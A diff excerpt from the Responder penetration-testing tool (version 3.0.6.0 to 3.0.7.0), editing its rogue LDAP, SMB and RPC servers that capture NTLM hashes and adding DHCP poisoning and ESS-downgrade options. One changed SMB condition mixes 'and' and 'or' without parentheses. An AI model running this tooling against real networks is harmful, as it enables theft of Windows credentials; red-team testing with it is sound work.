+	if re.search(b'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
 		return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=TID,MessageIDASN2Str=TID))
 
 	elif re.search(b'(?i)(objectClass0*.*supportedCapabilities)', data):
 		return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=TID,MessageIDASN2Str=TID))
 
-	if re.search(b'(objectClass)', data):
+	elif re.search(b'(objectClass)', data):
 		return str(LDAPSearchDefaultPacket(MessageIDASNStr=TID))
 
 def ParseLDAPHash(data,client, Challenge):  #Parse LDAP NTLMSSP v1/v2

servers/RPC.py

@@ -47,7 +47,7 @@ def Chose3264x(packet):
 
 def FindNTLMOpcode(data):
 	SSPIStart  = data.find(b'NTLMSSP')
-	if SSPIStart is -1:
+	if SSPIStart == -1:
 		return False
 	SSPIString = data[SSPIStart:]
 	return SSPIString[8:12]

servers/SMB.py

@@ -219,7 +219,7 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 					self.request.send(NetworkSendBufferPython2or3(buffer1))
 					data = self.request.recv(1024)
 
-                                ## Session Setup 1 answer SMBv2.
+                                ## Nego answer SMBv2.
 				if data[16:18] == b"\x00\x00" and data[4:5] == b"\xfe":
 					head = SMB2Header(MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'))
 					t = SMB2NegoAns(Dialect="\x10\x02")
@@ -238,7 +238,7 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 					self.request.send(NetworkSendBufferPython2or3(buffer1))
 					data = self.request.recv(1024)
                                 ## Session Setup 3 answer SMBv2.
-				if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' and data[4:5] == b'\xfe':
+				if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' or GrabMessageID(data)[0:1] == b'\x03' and data[4:5] == b'\xfe':
 					ParseSMBHash(data, self.client_address[0], Challenge)
 					head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data).decode('latin-1'))
 					t = SMB2Session2Data()
@@ -333,7 +333,7 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 class SMB1LM(BaseRequestHandler):  # SMB Server class, old version
 	def handle(self):
 		try:
-			self.request.settimeout(0.5)
+			self.request.settimeout(1)
 			data = self.request.recv(1024)
 			Challenge = RandomChallenge()
 			if data[0] == b"\x81":  #session request 139

settings.py

@@ -23,7 +23,7 @@ import subprocess
 
 from utils import *
 
-__version__ = 'Responder 3.0.6.0'
+__version__ = 'Responder 3.0.7.0'
 
 class Settings:
 	
@@ -68,7 +68,7 @@ class Settings:
 
 	def populate(self, options):
 
-		if options.Interface is None and utils.IsOsX() is False:
+		if options.Interface == None and utils.IsOsX() == False:
 			print(utils.color("Error: -I <if> mandatory option is missing", 1))
 			sys.exit(-1)
 
@@ -144,7 +144,7 @@ class Settings:
 		self.WPAD_Script      = config.get('HTTP Server', 'WPADScript')
 		self.HtmlToInject     = config.get('HTTP Server', 'HtmlToInject')
 
-		if self.Serve_Exe is True:	
+		if self.Serve_Exe == True:	
 			if not os.path.exists(self.Html_Filename):
 				print(utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1))
 
@@ -164,6 +164,7 @@ class Settings:
 		#Generate Random stuff for one Responder session
 		self.MachineName       = 'WIN-'+''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(11)])
 		self.Domain            = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(4)])
+		self.DHCPHostname      = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)])
 		self.DomainName        = self.Domain + '.LOCAL'
 		self.MachineNego       = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)]) +'$@'+self.DomainName
 		self.RPCPort           = random.randrange(45000, 49999)
@@ -176,9 +177,10 @@ class Settings:
 		# CLI options
 		self.ExternalIP         = options.ExternalIP
 		self.LM_On_Off          = options.LM_On_Off
+		self.NOESS_On_Off       = options.NOESS_On_Off
 		self.WPAD_On_Off        = options.WPAD_On_Off
 		self.Wredirect          = options.Wredirect
-		self.NBTNSDomain        = options.NBTNSDomain
+		self.DHCP_On_Off        = options.DHCP_On_Off
 		self.Basic              = options.Basic
 		self.Finger_On_Off      = options.Finger
 		self.Interface          = options.Interface
@@ -193,7 +195,7 @@ class Settings:
 		if self.ExternalIP:
 			self.ExternalIPAton = socket.inet_aton(self.ExternalIP)
 
-		if self.HtmlToInject is None:
+		if self.HtmlToInject == None:
 			self.HtmlToInject = ''
 
 		self.Bind_To         = utils.FindLocalIP(self.Interface, self.OURIP)

tools/RunFinger.py

@@ -22,7 +22,7 @@ from odict import OrderedDict
 import errno
 import optparse
 from RunFingerPackets import *
-__version__ = "1.2"
+__version__ = "1.3"
 
 parser = optparse.OptionParser(usage='python %prog -i 10.10.10.224\nor:\npython %prog -i 10.10.10.0/24', version=__version__, prog=sys.argv[0])
 
@@ -169,7 +169,10 @@ def dtoa(d):
 
 def OsNameClientVersion(data):
     try:
-        length = struct.unpack('<H',data[43:45].encode('latin-1'))[0]
+        if PY2OR3 == "PY3":
+                length = struct.unpack('<H',data[43:45].encode('latin-1'))[0]
+        else:
+                length = struct.unpack('<H',data[43:45])[0]
         if length > 255:
             OsVersion, ClientVersion = tuple([e.replace("\x00", "") for e in data[47+length:].split('\x00\x00\x00')[:2]])
             return OsVersion, ClientVersion

utils.py

@@ -369,6 +369,7 @@ def StartupMessage():
 	print('    %-27s' % "LLMNR" + enabled)
 	print('    %-27s' % "NBT-NS" + enabled)
 	print('    %-27s' % "DNS/MDNS" + enabled)
+	print('    %-27s' % "DHCP" + (enabled if settings.Config.DHCP_On_Off else disabled))
 	print('')
 
 	print(color("[+] ", 2, 1) + "Servers:")
@@ -403,6 +404,7 @@ def StartupMessage():
 	print('    %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled))
 	print('    %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled))
 	print('    %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled))
+	print('    %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True or settings.Config.LM_On_Off == True else disabled))
 	print('    %-27s' % "Fingerprint hosts" + (enabled if settings.Config.Finger_On_Off == True else disabled))
 	print('')
 
@@ -428,3 +430,4 @@ def StartupMessage():
 	print('    %-27s' % "Responder Machine Name" + color('[%s]' % settings.Config.MachineName, 5, 1))
 	print('    %-27s' % "Responder Domain Name" + color('[%s]' % settings.Config.DomainName, 5, 1))
 	print('    %-27s' % "Responder DCE-RPC Port " + color('[%s]' % settings.Config.RPCPort, 5, 1))
+